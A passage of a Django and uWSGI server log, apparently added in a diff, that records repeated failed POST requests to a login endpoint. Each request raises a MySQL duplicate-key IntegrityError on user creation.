"/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 163, in execute + result = self._query(query) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 321, in _query + conn.query(q) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 505, in query + self._affected_rows = self._read_query_result(unbuffered=unbuffered) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 724, in _read_query_result + result.read() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 1069, in read + first_packet = self.connection._read_packet() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 676, in _read_packet + packet.raise_for_error() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/protocol.py", line 223, in raise_for_error + err.raise_mysql_exception(self._data) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/err.py", line 107, in raise_mysql_exception + raise errorclass(errno, errval) +django.db.utils.IntegrityError: (1062, "Duplicate entry '123' for key 'uid'") +[pid: 2069|app: 0|req: 760/998] 219.228.146.246 () {48 vars in 1028 bytes} [Thu Jan 14 08:36:26 2021] POST /login/ => generated 208507 bytes in 139 msecs (HTTP/1.1 500) 6 headers in 187 bytes (1 switches on core 0) +Internal Server Error: /login/ +Traceback (most recent call last): + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute + return self.cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/mysql/base.py", line 73, in execute + return self.cursor.execute(query, args) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 163, in execute + result = self._query(query) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 321, in _query + conn.query(q) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 505, in query + self._affected_rows = self._read_query_result(unbuffered=unbuffered) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 724, in _read_query_result + result.read() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 1069, in read + first_packet = self.connection._read_packet() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 676, in _read_packet + packet.raise_for_error() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/protocol.py", line 223, in raise_for_error + err.raise_mysql_exception(self._data) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/err.py", line 107, in raise_mysql_exception + raise errorclass(errno, errval) +pymysql.err.IntegrityError: (1062, "Duplicate entry '123' for key 'uid'") + +The above exception was the direct cause of the following exception: + +Traceback (most recent call last): + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/exception.py", line 47, in inner + response = get_response(request) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/base.py", line 181, in _get_response + response = wrapped_callback(request, *callback_args, **callback_kwargs) + File "./app01/views.py", line 245, in login + models.User.objects.create(uid=uid, password=pwd) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/manager.py", line 85, in manager_method + return getattr(self.get_queryset(), name)(*args, **kwargs) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 447, in create + obj.save(force_insert=True, using=self.db) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 754, in save + force_update=force_update, update_fields=update_fields) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 792, in save_base + force_update, using, update_fields, + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 895, in _save_table + results = self._do_insert(cls._base_manager, using, fields, returning_fields, raw) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 935, in _do_insert + using=using, raw=raw, + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/manager.py", line 85, in manager_method + return getattr(self.get_queryset(), name)(*args, **kwargs) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 1254, in _insert + return query.get_compiler(using=using).execute_sql(returning_fields) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/sql/compiler.py", line 1397, in execute_sql + cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 98, in execute + return super().execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 66, in execute + return self._execute_with_wrappers(sql, params, many=False, executor=self._execute) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 75, in _execute_with_wrappers + return executor(sql, params, many, context) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute + return self.cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/utils.py", line 90, in __exit__ + raise dj_exc_value.with_traceback(traceback) from exc_value + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute + return self.cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/mysql/base.py", line 73, in execute + return self.cursor.execute(query, args) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 163, in execute + result = self._query(query) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 321, in _query + conn.query(q) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 505, in query + self._affected_rows = self._read_query_result(unbuffered=unbuffered) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 724, in _read_query_result + result.read() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 1069, in read + first_packet = self.connection._read_packet() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 676, in _read_packet + packet.raise_for_error() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/protocol.py", line 223, in raise_for_error + err.raise_mysql_exception(self._data) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/err.py", line 107, in raise_mysql_exception + raise errorclass(errno, errval) +django.db.utils.IntegrityError: (1062, "Duplicate entry '123' for key 'uid'") +[pid: 2069|app: 0|req: 761/999] 219.228.146.246 () {48 vars in 1028 bytes} [Thu Jan 14 08:36:28 2021] POST /login/ => generated 208507 bytes in 143 msecs (HTTP/1.1 500) 6 headers in 187 bytes (1 switches on core 1) +Internal Server Error: /login/ +Traceback (most recent call last): + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute + return self.cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/mysql/base.py", line 73, in execute + return self.cursor.execute(query, args) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 163, in execute + result = self._query(query) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 321, in _query + conn.query(q) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 505, in query + self._affected_rows = self._read_query_result(unbuffered=unbuffered) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 724, in _read_query_result + result.read() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 1069, in read + first_packet = self.connection._read_packet() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 676, in _read_packet + packet.raise_for_error() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/protocol.py", line 223, in raise_for_error + err.raise_mysql_exception(self._data) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/err.py", line 107, in raise_mysql_exception + raise errorclass(errno, errval) +pymysql.err.IntegrityError: (1062, "Duplicate entry '123' for key 'uid'") + +The above exception was the direct cause of the following exception: + +Traceback (most recent call last): + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/exception.py", line 47, in inner + response = get_response(request) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/base.py", line 181, in _get_response + response = wrapped_callback(request, *callback_args, **callback_kwargs) + File "./app01/views.py", line 245, in login + models.User.objects.create(uid=uid, password=pwd) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/manager.py", line 85, in manager_method + return getattr(self.get_queryset(), name)(*args, **kwargs) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 447, in create + obj.save(force_insert=True, using=self.db) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 754, in save + force_update=force_update, update_fields=update_fields) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 792, in save_base + force_update, using, update_fields, + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 895, in _save_table + results = self._do_insert(cls._base_manager, using, fields, returning_fields, raw) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 935, in _do_insert + using=using, raw=raw, + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/manager.py", line 85, in manager_method + return getattr(self.get_queryset(), name)(*args, **kwargs) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 1254, in _insert + return query.get_compiler(using=using).execute_sql(returning_fields) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/sql/compiler.py", line 1397, in execute_sql + cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 98, in execute + return super().execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 66, in execute + return self._execute_with_wrappers(sql, params, many=False, executor=self._execute) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 75, in _execute_with_wrappers + return executor(sql, params, many, context) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute + return self.cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/utils.py", line 90, in __exit__ + raise dj_exc_value.with_traceback(traceback) from exc_value + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute + return self.cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/mysql/base.py", line 73, in execute + return self.cursor.execute(query, args) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 163, in execute + result = self._query(query) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 321, in _query + conn.query(q) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 505, in query + self._affected_rows = self._read_query_result(unbuffered=unbuffered) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 724, in _read_query_result + result.read() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 1069, in read + first_packet = self.connection._read_packet() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 676, in _read_packet + packet.raise_for_error() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/protocol.py", line 223, in raise_for_error + err.raise_mysql_exception(self._data) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/err.py", line 107, in raise_mysql_exception + raise errorclass(errno, errval) +django.db.utils.IntegrityError: (1062, "Duplicate entry '123' for key 'uid'") +[pid: 2069|app: 0|req: 762/1000] 219.228.146.246 () {48 vars in 1028 bytes} [Thu Jan 14 08:36:28 2021] POST /login/ => generated 208507 bytes in 130 msecs (HTTP/1.1 500) 6 headers in 187 bytes (1 switches on core 0) +...The work of process 2069 is done. Seeya! +worker 1 killed successfully (pid: 2069) +Respawned uWSGI worker 1 (new pid: 11057) +Internal Server Error: /login/ +Traceback (most recent call last): + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute + return self.cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/mysql/base.py", line 73, in execute + return self.cursor.execute(query, args) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 163, in execute + result = self._query(query) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 321, in _query + conn.query(q) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 505, in query + self._affected_rows = self._read_query_result(unbuffered=unbuffered) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 724, in _read_query_result + result.read() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 1069, in read + first_packet = self.connection._read_packet() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 676, in _read_packet + packet.raise_for_error() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/protocol.py", line 223, in raise_for_error + err.raise_mysql_exception(self._data) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/err.py", line 107, in raise_mysql_exception + raise errorclass(errno, errval) +pymysql.err.IntegrityError: (1062, "Duplicate entry '123' for key 'uid'") + +The above exception was the direct cause of the following exception: + +Traceback (most recent call last): + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/exception.py", line 47, in inner + response = get_response(request) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/base.py", line 181, in _get_response + response = wrapped_callback(request, *callback_args, **callback_kwargs) + File "./app01/views.py", line 245, in login + models.User.objects.create(uid=uid, password=pwd) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/manager.py", line 85, in manager_method + return getattr(self.get_queryset(), name)(*args, **kwargs) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 447, in create + obj.save(force_insert=True, using=self.db) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 754, in save + force_update=force_update, update_fields=update_fields) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 792, in save_base + force_update, using, update_fields, + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 895, in _save_table + results = self._do_insert(cls._base_manager, using, fields, returning_fields, raw) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 935, in _do_insert + using=using, raw=raw, + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/manager.py", line 85, in manager_method + return getattr(self.get_queryset(), name)(*args, **kwargs) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 1254, in _insert + return query.get_compiler(using=using).execute_sql(returning_fields) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/sql/compiler.py", line 1397, in execute_sql + cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 98, in execute + return super().execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 66, in execute + return self._execute_with_wrappers(sql, params, many=False, executor=self._execute) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 75, in _execute_with_wrappers + return executor(sql, params, many, context) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute + return self.cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/utils.py", line 90, in __exit__ + raise dj_exc_value.with_traceback(traceback) from exc_value + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute + return self.cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/mysql/base.py", line 73, in execute + return self.cursor.execute(query, args) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 163, in execute + result = self._query(query) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 321, in _query + conn.query(q) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 505, in query + self._affected_rows = self._read_query_result(unbuffered=unbuffered) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 724, in _read_query_result + result.read() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 1069, in read + first_packet = self.connection._read_packet() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 676, in _read_packet + packet.raise_for_error() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/protocol.py", line 223, in raise_for_error + err.raise_mysql_exception(self._data) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/err.py", line 107, in raise_mysql_exception + raise errorclass(errno, errval) +django.db.utils.IntegrityError: (1062, "Duplicate entry '123' for key 'uid'") +[pid: 11057|app: 0|req: 763/1001] 219.228.146.246 () {48 vars in 1028 bytes} [Thu Jan 14 08:36:29 2021] POST /login/ => generated 208507 bytes in 270 msecs (HTTP/1.1 500) 6 headers in 187 bytes (1 switches on core 0) +Internal Server Error: /login/ +Traceback (most recent call last): + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute + return self.cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/mysql/base.py", line 73, in execute + return self.cursor.execute(query, args) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 163, in execute + result = self._query(query) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 321, in _query + conn.query(q) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 505, in query + self._affected_rows = self._read_query_result(unbuffered=unbuffered) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 724, in _read_query_result + result.read() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 1069, in read + first_packet = self.connection._read_packet() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 676, in _read_packet + packet.raise_for_error() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/protocol.py", line 223, in raise_for_error + err.raise_mysql_exception(self._data) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/err.py", line 107, in raise_mysql_exception + raise errorclass(errno, errval) +pymysql.err.IntegrityError: (1062, "Duplicate entry '123' for key 'uid'") + +The above exception was the direct cause of the following exception: + +Traceback (most recent call last): + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/exception.py", line 47, in inner + response = get_response(request) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/base.py", line 181, in _get_response + response = wrapped_callback(request, *callback_args, **callback_kwargs) + File "./app01/views.py", line 245, in login + models.User.objects.create(uid=uid, password=pwd) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/manager.py", line 85, in manager_method + return getattr(self.get_queryset(), name)(*args, **kwargs) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 447, in create + obj.save(force_insert=True, using=self.db) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 754, in save + force_update=force_update, update_fields=update_fields) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 792, in save_base + force_update, using, update_fields, + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 895, in _save_table + results = self._do_insert(cls._base_manager, using, fields, returning_fields, raw) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 935, in _do_insert + using=using, raw=raw, + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/manager.py", line 85, in manager_method + return getattr(self.get_queryset(), name)(*args, **kwargs) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 1254, in _insert + return query.get_compiler(using=using).execute_sql(returning_fields) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/sql/compiler.py", line 1397, in execute_sql + cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 98, in execute + return super().execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 66, in execute + return self._execute_with_wrappers(sql, params, many=False, executor=self._execute) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 75, in _execute_with_wrappers + return executor(sql, params, many, context) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute + return self.cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/utils.py", line 90, in __exit__ + raise dj_exc_value.with_traceback(traceback) from exc_value + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute + return self.cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/mysql/base.py", line 73, in execute + return self.cursor.execute(query, args) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 163, in execute + result = self._query(query) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 321, in _query + conn.query(q) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 505, in query + self._affected_rows = self._read_query_result(unbuffered=unbuffered) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 724, in _read_query_result + result.read() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 1069, in read + first_packet = self.connection._read_packet() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 676, in _read_packet + packet.raise_for_error() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/protocol.py", line 223, in raise_for_error + err.raise_mysql_exception(self._data) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/err.py", line 107, in raise_mysql_exception + raise errorclass(errno, errval) +django.db.utils.IntegrityError: (1062, "Duplicate entry '123' for key 'uid'") +[pid: 11057|app: 0|req: 764/1002] 219.228.146.246 () {48 vars in 1028 bytes} [Thu Jan 14 08:36:30 2021] POST /login/ => generated 208507 bytes in 157 msecs (HTTP/1.1 500) 6 headers in 187 bytes (2 switches on core 1) +Internal Server Error: /login/ +Traceback (most recent call last): + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute + return self.cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/mysql/base.py", line 73, in execute + return self.cursor.execute(query, args) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 163, in execute + result = self._query(query) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 321, in _query + conn.query(q) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 505, in query + self._affected_rows = self._read_query_result(unbuffered=unbuffered) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 724, in _read_query_result + result.read() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 1069, in read + first_packet = self.connection._read_packet() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 676, in _read_packet + packet.raise_for_error() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/protocol.py", line 223, in raise_for_error + err.raise_mysql_exception(self._data) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/err.py", line 107, in raise_mysql_exception + raise errorclass(errno, errval) +pymysql.err.IntegrityError: (1062, "Duplicate entry '123' for key 'uid'") + +The above exception was the direct cause of the following exception: + +Traceback (most recent call last): + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/exception.py", line 47, in inner + response = get_response(request) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/base.py", line 181, in _get_response + response = wrapped_callback(request, *callback_args, **callback_kwargs) + File "./app01/views.py", line 245, in login + models.User.objects.create(uid=uid, password=pwd) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/manager.py", line 85, in manager_method + return getattr(self.get_queryset(), name)(*args, **kwargs) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 447, in create + obj.save(force_insert=True, using=self.db) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 754, in save + force_update=force_update, update_fields=update_fields) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 792, in save_base + force_update, using, update_fields, + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 895, in _save_table + results = self._do_insert(cls._base_manager, using, fields, returning_fields, raw) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 935, in _do_insert + using=using, raw=raw, + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/manager.py", line 85, in manager_method + return getattr(self.get_queryset(), name)(*args, **kwargs) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 1254, in _insert + return query.get_compiler(using=using).execute_sql(returning_fields) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/sql/compiler.py", line 1397, in execute_sql + cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 98, in execute + return super().execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 66, in execute + return self._execute_with_wrappers(sql, params, many=False, executor=self._execute) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 75, in _execute_with_wrappers + return executor(sql, params, many, context) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute + return self.cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/utils.py", line 90, in __exit__ + raise dj_exc_value.with_traceback(traceback) from exc_value + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute + return self.cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/mysql/base.py", line 73, in execute + return self.cursor.execute(query, args) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 163, in execute + result = self._query(query) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 321, in _query + conn.query(q) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 505, in query + self._affected_rows = self._read_query_result(unbuffered=unbuffered) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 724, in _read_query_result + result.read() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 1069, in read + first_packet = self.connection._read_packet() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 676, in _read_packet + packet.raise_for_error() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/protocol.py", line 223, in raise_for_error + err.raise_mysql_exception(self._data) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/err.py", line 107, in raise_mysql_exception + raise errorclass(errno, errval) +django.db.utils.IntegrityError: (1062, "Duplicate entry '123' for key 'uid'") +[pid: 11057|app: 0|req: 765/1003] 219.228.146.246 () {48 vars in 1028 bytes} [Thu Jan 14 08:36:32 2021] POST /login/ => generated 208507 bytes in 149 msecs (HTTP/1.1 500) 6 headers in 187 bytes (2 switches on core 0) +Internal Server Error: /login/ +Traceback (most recent call last): + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute + return self.cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/mysql/base.py", line 73, in execute + return self.cursor.execute(query, args) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 163, in execute + result = self._query(query) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 321, in _query + conn.query(q) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 505, in query + self._affected_rows = self._read_query_result(unbuffered=unbuffered) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 724, in _read_query_result + result.read() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 1069, in 